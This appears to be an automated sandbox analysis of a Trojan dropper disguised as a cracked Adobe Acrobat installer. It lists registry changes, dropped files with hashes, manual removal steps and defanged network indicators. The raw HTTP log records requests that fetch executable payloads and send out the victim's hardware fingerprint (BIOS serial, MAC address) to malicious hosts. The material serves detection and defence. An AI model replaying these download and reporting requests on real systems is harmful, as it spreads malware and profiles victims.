The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
ce4b14250ff2c67d88aea6a5dc084652 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe |
ce4b14250ff2c67d88aea6a5dc084652 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe |
c17103ae9072a06da581dec998343fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll |
c498ae64b4971132bba676873978de1e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll |
7caaf58a526da33c24cbe122e7839693 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll |
c2c978b4b608c45c6bf61d68cdedaa0e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe |
fe25dac1837e5c2586e6ad6f00963925 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe |
89d40ecddf3ce6f3b0e6a84f40936912 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll |
53347df513f9fea942b17dc9fa94bda7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe |
6903caeeb494cf008c1305199ffd2dc4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23628 | 24064 | 4.46394 | 856b32eb77dfd6fb67f21d6543272da5 |
.rdata | 28672 | 4764 | 5120 | 3.4982 | dc77f8a1e6985a4361c55642680ddb4f |
.data | 36864 | 154712 | 1024 | 3.3278 | 7922d4ce117d7d5b3ac2cffe4b0b5e4f |
.ndata | 192512 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 233472 | 16944 | 17408 | 3.17675 | edad92707850619c3a3b7019022a50b3 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
hxxp://d3vzyycpfbk7qm.cloudfront.net/stats.php?bu=rx&c=&step=1 | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | |
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php | |
hxxp://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 | 104.25.229.18 |
hxxp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 | 54.88.152.23 |
hxxp://players.movinfra.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 | |
hxxp://players.movinfra.com/css/twin.css | |
hxxp://e6845.dscb1.akamaiedge.net/crls/secureca.crl | |
hxxp://e8218.dscb1.akamaiedge.net/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== | |
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T | |
hxxp://players.movinfra.com/js/main.js | |
hxxp://players.movinfra.com/css/fonts/font-awesome/fontawesome-webfont.eot? | |
hxxp://www-google-analytics.l.google.com/analytics.js | |
hxxp://clients.l.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz | |
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 | |
hxxp://players.movinfra.com/img/favicon/cinemaden.com/favicon.ico | |
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png | 107.20.147.93 |
hxxp://wet.sodcattilyrem.bid/stub_maker_uk2.php?url=hxxp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M | 52.222.174.45 |
hxxp://tour.cinemaden.com/img/favicon/cinemaden.com/favicon.ico | 52.205.102.180 |
hxxp://www.secularistsarakolet.site/index.php | 107.20.147.93 |
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2735&tid=10958132&b_typ=pe&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBN&reb=1&ic= | 52.222.174.188 |
hxxp://get.gunnightmar.club/stats.php?bu=rx&c=&step=1 | 52.222.174.219 |
hxxp://away.yosauruslega.bid/get.php?ses=482796663418412224 | 52.222.174.149 |
hxxp://get.gunnightmar.club/stats.php?bu=cp&c=&step= | 52.222.174.219 |
hxxp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://tour.cinemaden.com/css/fonts/font-awesome/fontawesome-webfont.eot? | 52.205.102.180 |
hxxp://www.google-analytics.com/r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 | 173.194.32.135 |
hxxp://g.symcd.com/MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== | 23.43.139.27 |
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz | 173.194.44.70 |
hxxp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://tour.cinemaden.com/js/main.js | 52.205.102.180 |
hxxp://crl.geotrust.com/crls/secureca.crl | 23.43.133.163 |
hxxp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 | 52.205.102.180 |
hxxp://clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T | 173.194.44.70 |
hxxp://tour.cinemaden.com/css/twin.css | 52.205.102.180 |
hxxp://www.google-analytics.com/analytics.js | 173.194.32.135 |
hxxp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack | 52.222.174.55 |
hxxp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.49.84.66 |
hxxp://get.ercationiv.club/launch_reb.php?p=sevenzip&tid=10958132&pid=2735&n=QWRvYmUgQWNyb2JhdCBYSSBQcm8gMTEuMC4xOCBNdWx0aWxpbmd1YWwgKyBDcmFjaw==&b_typ=pe | 52.222.174.100 |
hxxp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 52.222.174.20 |
hxxp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 | 54.88.21.193 |
hxxp://get.ynoptisticglob.bid/?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 | 52.222.174.190 |
ic-dc.deliverydlcenter.com | 52.222.174.140 |
ajax.googleapis.com | 74.125.205.95 |
fonts.googleapis.com | 173.194.222.95 |
fonts.gstatic.com | 74.125.232.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET hXXp://will.ymuscaesnortin.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Content-Length: 610
Connection: close
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:20 GMT
X-Cache: Miss from cloudfront
Via: 1.1 05e6fd312b38836c9def63a422bd7429.cloudfront.net (CloudFront)
X-Amz-Cf-Id: vcKTRVplgIUTG_66QpD6lKWviTpBw1QE1sY0ZYnreDadUDujEcGOfA==
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>..
GET /analytics.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Timing-Allow-Origin: *
Date: Sun, 27 Nov 2016 14:38:31 GMT
Expires: Sun, 27 Nov 2016 16:38:31 GMT
Last-Modified: Wed, 28 Sep 2016 20:19:01 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 11590
Age: 3614
Cache-Control: public, max-age=7200
<<< skipped >>>
GET /css/twin.css HTTP/1.1
Accept: text/css
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css
Date: Sun, 27 Nov 2016 15:38:42 GMT
ETag: W/"58372388-3b06f"
Last-Modified: Thu, 24 Nov 2016 17:29:44 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
transfer-encoding: chunked
Connection: keep-alive
<<< skipped >>>
GET /css/fonts/font-awesome/fontawesome-webfont.eot? HTTP/1.1
Accept: */*
Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Origin: hXXp://tour.cinemaden.com
Accept-Encoding: gzip, deflate
Host: tour.cinemaden.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/vnd.ms-fontobject
Date: Sun, 27 Nov 2016 15:38:45 GMT
ETag: "57325088-10d0b"
Last-Modified: Tue, 10 May 2016 21:20:08 GMT
Server: nginx
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 68875
Connection: keep-alive
<<< skipped >>>
POST hXXp://will.ymuscaesnortin.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: will.ymuscaesnortin.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 403 Forbidden
Server: CloudFront
Date: Sun, 27 Nov 2016 15:38:15 GMT
Content-Type: text/html
Content-Length: 689
Connection: close
X-Cache: Error from cloudfront
Via: 1.1 93c5c2940efa6748481c787e7c245f82.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: 2V_U9yCYMa6XDOCQ6ClUAPr3RaMHJ3lbx2Et3RQgqm9-CypCvoY-kg==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..
GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&transId=139867460&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.7188832209728342 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.wintervenepest.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:30 GMT
Content-Length: 0
GET /stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: off.ncongruousric.bid
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 67426
Connection: keep-alive
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="583afdd9a9098.exe"
X-Powered-By: ASP.NET
Date: Sun, 27 Nov 2016 15:38:02 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e4a44efc4b3241dc23019df63a1f645c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: mqZv_Hk7WsVo5gRdzQsl8YqdXLbfXdm6CwSxY3B06yeKlYsWx7oY_w==
<<< skipped >>>
POST hXXp://ee.wintervenepest.bid/installer.php?affId=1006&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&trackingId=139867460&cc=UA&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.wintervenepest.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
Content-Type: application/x-www-form-urlencoded
Content-Length: 602
cid=5c12d1104cca24294ae7d8d45ce8d028&uac=1&id[]=1912&id[]=1913&id[]=2557&id[]=2558&id[]=2559&id[]=2560&id[]=2561&id[]=2562&id[]=2563&id[]=2834&id[]=2835&id[]=3023&id[]=3024&id[]=3517&id[]=3518&id[]=3519&id[]=3520&id[]=3617&id[]=3618&id[]=2664&id[]=2665&id[]=2666&id[]=2667&id[]=2668&id[]=2669&id[]=2670&id[]=2671&id[]=2672&id[]=2673&id[]=2674&id[]=2675&id[]=1914&id[]=1915&id[]=2534&id[]=2536&id[]=2537&id[]=2538&id[]=2539&id[]=2541&id[]=2542&id[]=2543&id[]=2544&id[]=2545&id[]=2546&id[]=2547&id[]=2548&id[]=2549&id[]=2550&id[]=2551&id[]=2552&id[]=2553&id[]=2554&id[]=2555&id[]=2556&id[]=3266&id[]=2695
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 27 Nov 2016 15:37:22 GMT
Connection: close
Content-Length: 76128
<<< skipped >>>
GET /normal_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: d2adi7hu49xk5t.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 26781
Connection: keep-alive
Date: Thu, 22 Sep 2016 18:01:12 GMT
Last-Modified: Mon, 13 Jun 2016 11:29:07 GMT
ETag: "b5b0ebe137c0293f816eaac3de2b4e51"
Accept-Ranges: bytes
Server: AmazonS3
Age: 74433
X-Cache: Hit from cloudfront
Via: 1.1 14484a063800eaed878a3068abf4dfac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RczU8nabXC7YY05ZRPnbSYN4ruZ16XLLgkDlYC3eb6xeh2YUccPUaQ==
<<< skipped >>>
GET /9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: aclick.adhoc2.net
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sun, 27 Nov 2016 15:38:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da060fb656d4e2b9f0756b182bd523f481480261121; expires=Mon, 27-Nov-17 15:38:41 GMT; path=/; domain=.adhoc2.net; HttpOnly
Location: hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999
Server: cloudflare-nginx
CF-RAY: 3086ab26d67b4014-SOF
b3..<a href="hXXp://ads.affbuzzads.com/redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999">Found</a>.....0..
GET /get.php?ses=482796663418412224 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 753152
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 27 Nov 2016 15:37:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 23d92aa442d5ae9ed0313643d8764687.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Tb6ZJ-_nkdTtqyG7ZIBb1o9GqM223LHzFjNSNfbX87GUeAUw5AtP-Q==
<<< skipped >>>
GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1
Cache-Control: max-age = 564348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g.symcd.com
HTTP/1.1 200 OK
Server: nginx/1.10.1
Content-Type: application/ocsp-response
Content-Length: 1362
content-transfer-encoding: binary
Cache-Control: max-age=563498, public, no-transform, must-revalidate
